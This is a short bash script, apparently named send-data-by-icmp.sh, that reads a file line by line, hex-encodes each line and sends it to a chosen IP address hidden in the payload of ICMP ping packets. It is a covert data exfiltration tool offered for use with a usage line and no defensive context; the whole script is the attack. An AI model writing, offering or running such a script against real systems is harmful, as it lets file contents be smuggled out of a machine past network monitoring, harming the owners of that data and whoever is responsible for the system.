#!/bin/bash
#How To Use
#"./send-data-by-icmp.sh [file] [ip]"


while read -r line; do
# Reading each line1
tempip=$2
tempdata=$(echo "--$line" | xxd -p )

ping -c 1 $tempip -p "$tempdata" -q -w 1 -W 1 &
done < $1
